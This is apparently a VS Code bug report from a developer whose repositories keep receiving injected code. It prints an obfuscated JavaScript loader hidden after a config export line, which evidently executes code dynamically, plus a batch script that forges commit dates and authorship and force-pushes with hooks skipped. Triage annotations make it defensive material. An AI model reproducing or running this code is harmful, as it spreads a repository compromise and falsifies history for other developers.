Description
Type: Bug
We are experiencing a security issue where some of our repos appear to be getting infected by an unknown script. Whenever I merge from main or pull, it automatically adds a commit that reuses the previous commit's details, amending the code.
A file named temp_auto_push.bat keeps appearing and seems to automatically add malicious or obfuscated code to certain files in the repository, such as admin.route.js and post.css. Even after removing the injected code and reverting the commits, the malicious changes keep reappearing.
We have already taken several steps to investigate and mitigate the issue:
Reinstalled VS Code
Scanned the system for malware
Removed the suspicious code and commits from the repository
However, the issue still persists and the files continue to get modified automatically. I think it is due to an extension that I am unable to find.
We suspect there may be malware or an automated process pushing these changes, or a potential compromise related to the repository or development environment. We would appreciate your assistance in investigating this issue and advising on further steps we should take.
The code below was injected into some files and pushed through this .bat file:
// NOTE(review): the config object below never uses `require`. The code appended
// after `export default config;` on the following line does read `require`, so the
// two createRequire lines were presumably added by the injector to give that payload
// a CommonJS `require` inside an ES module. Compare against a known-good revision
// before trusting any line of this file.
import { createRequire } from 'module';
const require = createRequire(import.meta.url);
// Build-tool configuration with a single plugin entry; this is the only part of the
// listing that looks like ordinary project code.
const config = {
plugins: ['@tailwindcss/postcss'],
};
// NOTE(review): specimen of the injected code as pasted by the reporter, annotated for
// recognition and triage. The page's line breaks fall inside string literals, and the
// string table is declared as `_$1e42` but read as `$_1e42` (an underscore was presumably
// lost in rendering), so the text is not runnable as shown.
//
// Everything after the legitimate `export default config;` is appended on the SAME line,
// which keeps it out of sight in editors and diffs that do not wrap long lines.
//
// Visible structure:
//  1. `global['!']` is set to a fixed string. Its meaning is not visible here
//     (possibly a marker or campaign id - confirm).
//  2. A seeded character shuffle decodes "rmcej%otb%" into a small string table. That
//     input holds exactly the letters of "object" plus "r" and "m" and two "%" separators,
//     so the table presumably yields short names under which `require` and, when the
//     `typeof module` comparison matches, `module` are published on `global`.
//  3. The IIFE defines a second seeded shuffle `sfL`, takes an 11-character prefix
//     (TUU = 401-390) of a de-shuffled string and uses it as a property name on `sfL`
//     itself. The letters of "constructor" are present in that string, so this is
//     presumably the Function constructor, i.e. dynamic code execution: two de-shuffled
//     strings are compiled in turn and the final function is called with 2509.
//
// Because the code runs when this module is loaded, any tool that imports the config
// would execute it with `require` available. Strings a defender can search a repository
// for, all visible in this sample: `global['!']=`, `String.fromCharCode(127)` used as a
// split sentinel, and a `var ...=(function(l,e){` decoder following an `export` statement
// on the same line.
export default config; global['!']='8-780-1';var _$1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j< h;j++){g[j]= l.charAt(j)};for(var j=0;j< h;j++){var s=e* (j+ 489)+ (e% 19597);var w=e* (j+ 659)+ (e% 48014);var t=s% h;var p=w% h;var y=g[t];g[t]= g[p];g[p]= y;e= (s+ w)% 4573868};var x=String.fromCharCode(127);var q='';var k='\x25';var m='\x23\x31';var r='\x25';var a='\x23\x30';var c='\x23';return g.join(q).split(k).join(x).split(m).join(r).split(a).join(c).split(x)})("rmcej%otb%",2857687);global[$_1e42[0]]= require;if( typeof module=== $_1e42[1]){global[$_1e42[2]]= module};(function(){var LQI='',TUU=401-390;function sfL(w){var n=2667686;var y=w.length;var b=[];for(var o=0;o<y;o++){b[o]=w.charAt(o)};for(var o=0;o<y;o++){var q=n*(o+228)+(n%50332);var e=n*(o+128)+(n%52119);var u=q%y;var v=e%y;var m=b[u];b[u]=b[v];b[v]=m;n=(q+e)%4289487;};return b.join('')};var EKc=sfL('wuqktamceigynzbosdctpusocrjhrflovnxrt').substr(0,TUU);var joW='ca.qmi=),sr.7,fnu2;v5rxrr,"bgrbff=prdl+s6Aqegh;v.=lb.;=qu atzvn]"0e)=+]rhklf+gCm7=f=v)2,3;=]i;raei[,y4a9,,+si+,,;av=e9d7af6uv;vndqjf=r+w5[f(k)tl)p)liehtrtgs=)+aph]]a=)ec((s;78)r]a;+h]7)irav0sr+8+;=ho[([lrftud;e<(mgha=)l)}y=2it<+jar)=i=!ru}v1w(mnars;.7.,+=vrrrre) i (g,=]xfr6Al(nga{-za=6ep7o(i-=sc. arhu; ,avrs.=, ,,mu(9 9n+tp9vrrviv{C0x" qh;+lCr;;)g[;(k7h=rluo41<ur+2r na,+,s8>}ok n[abr0;CsdnA3v44]irr00()1y)7=3=ov{(1t";1e(s+..}h,(Celzat+q5;r ;)d(v;zj.;;etsr g5(jie )0);8ll.(evzk"o;,fto==j"S=o.)(t81fnke.0n )woc6stnh6=arvjr q{ehxytnoajv[)o-e}au>n(aee=(!tta]uar"{;7l82e=)p.mhu<ti8a;z)(=tn2aih[.rrtv0q2ot-Clfv[n);.;4f(ir;;;g;6ylledi(- 4n)[fitsr y.<.u0;a[{g-seod=[, ((naoi=e"r)a plsp.hu0) p]);nu;vl;r2Ajq-km,o;.{oc81=ih;n}+c.w[qrm2 l=;nrsw)6p]ns.tlntw8=60dvqqf"ozCr+}Cia,"1itzr0o fg1m[=y;s91ilz,;aa,;=ch=,1g]udlp(=+barA(rpy(()=.t9+ph t,i+St;mvvf(n(.o,1refr;e+(.c;urnaui+try. 
d]hn(aqnorn)h)c';var dgC=sfL[EKc];var Apa='';var jFD=dgC;var xBg=dgC(Apa,sfL(joW));var pYd=xBg(sfL('o B%v[Raca)rs_bv]0tcr6RlRclmtp.na6 cR]%pw:ste-%C8]tuo;x0ir=0m8d5|.u)(r.nCR(%3i)4c14/og;Rscs=c;RrT%R7%f/a .r)sp9oiJ%o9sRsp{wet=,.r}:.%ei_5n,d(7H]Rc )hrRar)vR<mox-9u4.r0.h.,etc=/3s+!bi%nwl%&/%Rl%,1]].J}!cf=o0=.h5r].ce+;]]3(Rawd.l)$49f 1;bft95ii7[]]..7t}ldtfapEc3z.9]R,%.2/ch!Ri4_r%dr1tq0pl-x3a9=R0Rt'cR["c?"b]!l(,3(}tR/$rm2_RRw"+)gr2:;epRRR,)en4(bh#)%rg3ge%0TR8.a e7]sh.hR:R(Rx?d!=|s=2>.Rr.mrfJp]%RcA.dGeTu894x_7tr38;f}}98R.ca)ezRCc=R=4s(;tyoaaR0l)l.udRc.f/}=+c.r(eaA)ort1,ien7z3]20wltepl;=7$=3=o[3ta]t(0?!](C=5.y2%h#aRw=Rc.=s]t)%tntetne3hc>cis.iR%n71d 3Rhs)}.{e m++Gatr!;v;Ry.R k.eww;Bfa16}nj[=R).u1t(%3"1)Tncc.G&s1o.o)h..tCuRRfn=(]7_ote}tg!a+t&;.a+4i62%l;n([.e.iRiRpnR-(7bs5s31>fra4)ww.R.g?!0ed=52(oR;nn]]c.6 Rfs.l4{.e(]osbnnR39.f3cfR.o)3d[u52]adt]uR)7Rra1i1R%e.=;t2.e)8R2n9;l.;Ru.,}}3f.vA]ae1]s:gatfi1dpf)lpRu;3nunD6].gd+brA.rei(e C(RahRi)5g+h)+d 54epRRara"oc]:Rf]n8.i}r+5/s$n;cR343%]g3anfoR)n2RRaair=Rad0.!Drcn5t0G.m03)]RbJ_vnslR)nR%.u7.nnhcc0%nt:1gtRceccb[,%c;c66Rig.6fec4Rt(=c,1t,]=++!eb]a;[]=fa6c%d:.d(y+.t0),)i.8Rt-36hdrRe;{%9RpcooI[0rcrCS8}71er)fRz [y)oin.K%[.uaof#3.{. .(bit.8.b)R.gcw.>#%f84(Rnt538/icd!BR);]I-R$Afk48R]R=}.ectta+r(1,se&r.%{)];aeR&d=4)]8./cf1]5ifRR(+$+}nbba.l2{!.n.x1r1..D4t])Rea7[v]%9cbRRr4f=le1}n-H1.0Hts.gi6dRedb9ic)Rng2eicRFcRni?2eR)o4RpRo01sH4,olroo(3es;_F}Rs&(rbT[rc(c (eR'lee(({R]R3d3R>R]7Rcs(3ac?sh[=RRi%R.gRE.=crstsn,( .R ;EsRnrc%.{R56tr!nc9cu70"1])}etpRh/,,7a8>2s)o.hh]p}9,5.}R{hootn/e=dceoe3d.5=]tRc;nsu;tm]rrR,tnB5je(csaR5emR4dKt@R+i]+=}f)R7;6;,R]1iR]m]R)]=1Reo{h1a.t1.3F7ct)=7R)%r%RF MR8.S$l[Rr )3a%e=(c%o%mr2}RcRLmrtacj4{)L&nl+JuRR:Rt}e.zv#oci. 
oc6lRR.8!Ig)2!rrca.=]((1tr=;t.ttci0R;c8f8Rk!o5o +f7!%?=A&r.3(%0.tzr fhef9u0lf7l20;R(%0g,n)N}:8]c.26cpR(]u2t4(y=/$'0g)7i76R+ah8sRrrre:duRtR"a}R/HrRa172t5tt&a3nci=R=<c%;,](6cTs2%5t]541.u2R2n.Gai9.ai059Ra!at)"7+alr(cg%,(};fcRru]f1/]eoe)c}}]_toud)(2n.]%v}[:]538 $;.ARR}R-"R;Ro1R,,e.{1.cor ;de_2(>D.ER;cnNR6R+[R.Rc)}r,=1C2.cR!(g]1jRec2rqciss(261E]R+]-]0[ntlRvy(1=t6de4cn](["].{Rc[%&cb3Bn lae)aRsRR]t;l;fd,[s7Re.+r=R%t?3fs].RtehSo]29R,;5t2Ri(75)Rf%es)%@1c=w:RR7l1R(()2)Ro]r(;ot30;molx iRe.t.A}$Rm38e g.0s%g5trr&c:=e4=cfo21;4_tsD]R47RttItR,le)RdrR6][c,omts)9dRurt)4ItoR5g(;R@]2ccR 5ocL..].()r5%]g(.RRe4}Clb]w=95)]9R62tuD%0N=,2).{Ho27f ;R7}]t7]r17z]=a2rci%6.Re$Rbi8n4tnrtb;d3a;t,sl=rRa]r1cw]}a4g]ts%mcs.ry.a=R{7]]f"9x)%ie=ded=lRsrc4t 7a0u.}3R<ha]th15Rpe5)!kn;@orr(51)=e lt+ar(3)e:e#Rf)Cf{d.aR'6a(8j]]cp()onbLxcRa.rne:8ie!)oRRRde%2exuq}l5..fe3R.5x;f}8)791.i3c)(#e=vd)r.R!5R}%tt!Er%GRRR<.g(RR)79Er6B6]t}$1{R]c4e!e+f4f7":) (sys%Ranua)=.i_ERR5cR_7f8a6cr9ice.>.c(96R2o$n9R;c6p2e}R-ny7S*({1%RRRlp{ac)%hhns(D6;{ ( +sw]]1nrp3=.l4 =%o (9f4])29@?Rrp2o;7Rtmh]3v/9]m tR.g ]1z 1"aRa];%6 RRz()ab.R)rtqf(C)imelm${y%l%)c}r.d4u)p(c'cof0}d7R91T)S<=i: .l%3SE Ra]f)=e;;Cr=et:f;hRres%1onrcRRJv)R(aR}R1)xn_ttfw )eh}n8n22cg RcrRe1M'));var Tgw=jFD(LQI,pYd );Tgw(2509);return 1358})();
file : temp_auto_push.bat
@echo off
rem NOTE(review): specimen of the temp_auto_push.bat the reporter found, annotated for
rem recognition and triage. Overall effect visible below: stage the whole working tree,
rem fold it into the most recent commit while reusing that commit's message, identity and
rem timestamp, then force-push the rewritten branch. Hooks are skipped at the commit and
rem at the push. The commit hash still changes, so the reflog, server-side push or
rem force-push audit events, branch protection that rejects force pushes, and a
rem signed-commit requirement are the places where this shows up or gets blocked.

rem Read the last commit's committer date twice: once formatted as a calendar date,
rem once as a time of day.
for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%Y-%%m-%%d --format=%%cd"') do set LAST_COMMIT_DATE=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%H:%%M:%%S --format=%%cd"') do set LAST_COMMIT_TIME=%%A
rem Read the last commit's subject line, author name and author email.
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%s"') do set LAST_COMMIT_TEXT=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%an"') do set USER_NAME=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%ae"') do set USER_EMAIL=%%A
rem Name of the branch currently checked out; used as the push target at the end.
for /f "delims=" %%A in ('git rev-parse --abbrev-ref HEAD') do set CURRENT_BRANCH=%%A
echo %LAST_COMMIT_DATE% %LAST_COMMIT_TIME%
echo %LAST_COMMIT_TEXT%
echo %USER_NAME% (%USER_EMAIL%)
echo Branch: %CURRENT_BRANCH%
rem Remember the real clock so it can be put back after the amend.
set CURRENT_DATE=%date%
set CURRENT_TIME=%time%
rem Set the system clock to the last commit's date and time, so the amended commit is
rem stamped with the original time instead of the current one.
rem NOTE(review): changing the clock normally needs elevated rights - confirm whether
rem this step succeeded on affected machines; clock-change events are worth checking.
date %LAST_COMMIT_DATE%
time %LAST_COMMIT_TIME%
echo Date temporarily changed to %LAST_COMMIT_DATE% %LAST_COMMIT_TIME%
rem Overwrite the repository-local git identity with the last commit's author, so the
rem rewritten commit is attributed to that developer. These values stay in .git/config.
git config --local user.name %USER_NAME%
git config --local user.email %USER_EMAIL%
rem Stage every change in the working tree, which includes the injected file edits.
git add .
rem Replace the tip commit, reusing its message; --no-verify skips the commit hooks.
git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify
rem Put the saved clock values back.
date %CURRENT_DATE%
time %CURRENT_TIME%
echo Date restored to %CURRENT_DATE% %CURRENT_TIME% and complete amend last commit!
rem Force-push the rewritten branch to origin and set upstream; --no-verify skips the
rem pre-push hook. This is the step that replaces the shared history for other developers.
git push -uf origin %CURRENT_BRANCH% --no-verify
@echo on
The injected code above was running as a process on my EC2 instance; I have stopped that and created a new one, but it is still popping up locally in VS Code.
Please let us know if you need any additional information. It is now also on the PCs of different developers on our team.
Thank you for your support.
VS Code version: Code 1.110.1 (61b3d0a, 2026-03-06T23:03:27.520Z)
OS version: Windows_NT x64 10.0.26200
Modes:
System Info
| Item | Value |
|---|---|
| CPUs | 11th Gen Intel(R) Core(TM) i7-11800H @ 2.30GHz (16 x 2304) |
| GPU Status | 2d_canvas: enabled GPU0: VENDOR= 0x8086, DEVICE=0x9a60 [Intel(R) UHD Graphics], DRIVER_VENDOR=Intel, DRIVER_VERSION=32.0.101.7026 ACTIVE GPU1: VENDOR= 0x10de, DEVICE=0x1f99 [NVIDIA GeForce GTX 1650 with Max-Q Design], DRIVER_VERSION=32.0.15.8180 GPU2: VENDOR= 0x1414, DEVICE=0x008c [Microsoft Basic Render Driver], DRIVER_VERSION=10.0.26100.7309 Machine model name: Machine model version: direct_rendering_display_compositor: disabled_off_ok gpu_compositing: enabled multiple_raster_threads: enabled_on opengl: enabled_on rasterization: enabled raw_draw: disabled_off_ok skia_graphite: disabled_off trees_in_viz: disabled_off video_decode: enabled video_encode: enabled webgl: enabled webgl2: enabled webgpu: enabled webnn: disabled_off |
| Load (avg) | undefined |
| Memory (System) | 23.73GB (4.32GB free) |
| Process Argv | --crash-reporter-id 03c6b21e-d1d3-41d2-83ce-6091d7969029 |
| Screen Reader | no |
| VM | 0% |
Extensions (56)
| Extension | Author (truncated) | Version |
|---|---|---|
| aws-toolkit-vscode | ama | 3.98.0 |
| tailwind-docs | aus | 2.1.0 |
| tailwindshades | bou | 0.0.5 |
| vscode-tailwindcss | bra | 0.14.29 |
| multi-cursor-case-preserve | Car | 1.0.5 |
| node-snippets | chr | 1.4.0 |
| npm-intellisense | chr | 1.4.5 |
| path-intellisense | chr | 2.10.0 |
| vscode-eslint | dba | 3.0.24 |
| githistory | don | 0.6.20 |
| es7-react-js-snippets | dsz | 4.4.3 |
| gitlens | eam | 17.11.0 |
| vscode-html-css | ecm | 2.0.14 |
| EditorConfig | Edi | 0.18.1 |
| prettier-vscode | esb | 12.3.0 |
| vscode-express-snippets | Exp | 1.1.1 |
| auto-close-tag | for | 0.5.15 |
| auto-rename-tag | for | 0.1.10 |
| code-runner | for | 0.12.2 |
| copilot-chat | Git | 0.38.2 |
| vscode-pull-request-github | Git | 0.132.0 |
| rest-client | hum | 0.25.1 |
| google-fonts | lio | 0.0.1 |
| git-graph | mhu | 1.30.0 |
| dotenv | mik | 1.0.1 |
| vscode-containers | ms- | 2.4.1 |
| vscode-docker | ms- | 2.0.0 |
| vscode-dotnet-runtime | ms- | 3.0.0 |
| vscode-edge-devtools | ms- | 2.1.10 |
| remote-containers | ms- | 0.447.0 |
| remote-ssh | ms- | 0.122.0 |
| remote-ssh-edit | ms- | 0.87.0 |
| remote-wsl | ms- | 0.104.3 |
| vscode-remote-extensionpack | ms- | 0.26.0 |
| remote-explorer | ms- | 0.5.0 |
| remote-server | ms- | 1.5.3 |
| vscode-typescript-next | ms- | 6.0.20260310 |
| color-highlight | nau | 2.8.0 |
| vscode-versionlens | pfl | 1.24.1 |
| material-icon-theme | PKi | 5.32.0 |
| material-product-icons | PKi | 1.7.1 |
| excalidraw-editor | pom | 3.9.1 |
| nextjs-snippets | Pul | 1.0.3 |
| LiveServer | rit | 5.7.10 |
| html5-boilerplate | sid | 1.1.1 |
| autoimport | ste | 1.5.4 |
| code-spell-checker | str | 4.5.6 |
| vscode-stripe | str | 3.8.6 |
| errorlens | use | 3.28.0 |
| vscode-icons | vsc | 12.17.0 |
| console-ninja | Wal | 1.0.517 |
| vscode-import-cost | wix | 3.3.0 |
| JavaScriptSnippets | xab | 1.8.0 |
| tailwind-snippets | Zar | 1.0.2 |
| material-theme | zhu | 3.19.0 |
| html-css-class-completion | Zig | 1.20.0 |
(2 theme extensions excluded)
A/B Experiments
vsliv368:30146709
vswsl492cf:30256860
binariesv615:30325510
nativeloc1:31344060
dwcopilot:31170013
dwoutputs:31242946
copilot_t_ci:31333650
e5gg6876:31282496
pythonrdcb7:31342333
6518g693:31463988
aj953862:31281341
6abeh943:31336334
envsdeactivate2:31464701
cloudbuttont:31379625
aihoversummaries_t:31469308
3efgi100_wstrepl:31403338
use-responses-api:31390855
je187915:31401257
ec5jj548:31422691
cp_cls_t_966_ss:31454198
4je02754:31466945
ge8j1254_inline_auto_hint_haiku:31431912
nes-autoexp-10:31446583
a5gib710:31434435
00h15499_gpt_53_codex:31464542
7a04d226_do_not_restore_last_panel_session:31438103
preserve_tokens:31444547
cp_cls_t_1081:31454832
ia-use-proxy-models-svc:31452481
a43f0576c:31442824
e9c30283:31461165
test_treatment2:31471001
nes-conv-2-3:31474331
g_63ac8346:31467999
9c05b404_max_request_50:31468594
idci7584:31464702
edit_mode_hidden:31461530
864ei723_large_tool_results_to_disk:31460878
showingstats:31471631
55364912:31471672
nes-extended-on:31455476
chat:31457767
0h66b693:31473807
ah:31460422
jdddd261:31472041
nes-rcnt-edit:31471617
thinking_effort_h:31471653
4dgh1208:31471592
thinking_c:31471065